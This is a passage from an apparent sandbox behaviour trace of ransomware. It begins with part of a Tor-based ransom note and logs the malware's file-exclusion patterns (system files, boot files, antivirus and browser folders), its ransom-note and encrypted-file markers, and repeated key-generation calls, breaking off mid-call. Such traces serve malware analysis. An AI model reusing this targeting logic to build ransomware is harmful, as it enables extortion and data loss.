If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0154.556] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0154.556] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0154.556] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0154.556] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0154.556] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0154.556] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0154.556] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0154.556] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\*", pszSpec="*.exe") returned 0 [0154.556] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\*", pszSpec="*.dll") returned 0 [0154.556] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\*", pszSpec="*.lnk") returned 0 [0154.556] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\*", pszSpec="*.bat") returned 0 [0154.556] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\*", pszSpec="*.ini") returned 0 [0154.556] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\*", pszSpec="*.msi") returned 0 [0154.556] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\*", pszSpec="*.scf") returned 0 [0154.556] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\*", pszSpec="*pagefile.sys*") returned 0 [0154.556] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\*", pszSpec="*NTUSER.DAT*") returned 0 [0154.556] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\*", pszSpec="*AppData*") returned 0 [0154.556] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\*", pszSpec="*\\winrar\\*") returned 0 [0154.556] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0154.556] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\*", pszSpec="*\\java\\*") returned 0 [0154.556] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0154.556] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\*", pszSpec="*\\windows\\*") returned 0 [0154.556] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\*", pszSpec="*\\ESET\\*") returned 0 [0154.556] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\*", pszSpec="*\\AVG\\*") returned 0 [0154.556] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\*", pszSpec="*\\AVIRA\\*") returned 0 [0154.556] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0154.557] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\*", pszSpec="*Atheros*") returned 0 [0154.557] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\*", pszSpec="*Realtek*") returned 0 [0154.557] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\*", pszSpec="*bootmgr*") returned 0 [0154.557] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\*", pszSpec="*boot*") returned 0 [0154.557] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\*", pszSpec="*boot*") returned 0 [0154.557] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\*", pszSpec="*CONFIG.SYS*") returned 0 [0154.557] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\*", pszSpec="*IO.SYS*") returned 0 [0154.557] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\*", pszSpec="*MSDOS.SYS*") returned 0 [0154.557] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\*", pszSpec="*NTDETECT.COM*") returned 0 [0154.557] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\*", pszSpec="*ntldr*") returned 0 [0154.557] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\*", pszSpec="*chrome*") returned 0 [0154.557] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\*", pszSpec="*opera*") returned 0 [0154.557] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\*", pszSpec="*firefox*") returned 0 [0154.557] wcslen (_String="\\\\?\\") returned 0x4 [0154.557] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\*", lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0x9ad778 [0154.557] wcscmp (_String1=".", _String2=".") returned 0 [0154.557] FindNextFileW (in: hFindFile=0x9ad778, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0154.557] wcscmp (_String1="..", _String2=".") returned 1 [0154.557] wcscmp (_String1="..", _String2="..") returned 0 [0154.557] FindNextFileW (in: hFindFile=0x9ad778, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0154.557] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NMCRYPT") returned 0 [0154.557] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0154.558] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.exe") returned 0 [0154.558] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.dll") returned 0 [0154.558] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.lnk") returned 0 [0154.558] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.bat") returned 0 [0154.558] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.ini") returned 0 [0154.558] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.msi") returned 0 [0154.558] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.scf") returned 0 [0154.558] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0154.558] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0154.558] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*AppData*") returned 0 [0154.558] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0154.558] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0154.558] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\java\\*") returned 0 [0154.558] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0154.558] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\windows\\*") returned 0 [0154.558] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0154.558] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0154.558] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0154.558] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0154.558] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Atheros*") returned 0 [0154.558] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Realtek*") returned 0 [0154.558] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*bootmgr*") returned 0 [0154.558] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0154.558] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0154.558] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0154.558] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*IO.SYS*") returned 0 [0154.558] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0154.558] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0154.558] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*ntldr*") returned 0 [0154.558] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*chrome*") returned 0 [0154.558] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*opera*") returned 0 [0154.558] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*firefox*") returned 0 [0154.558] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\tipresx.dll.mui", pszSpec="*") returned 1 [0154.558] strlen (_Str="NMoreira") returned 0x8 [0154.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.558] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.559] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.560] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, 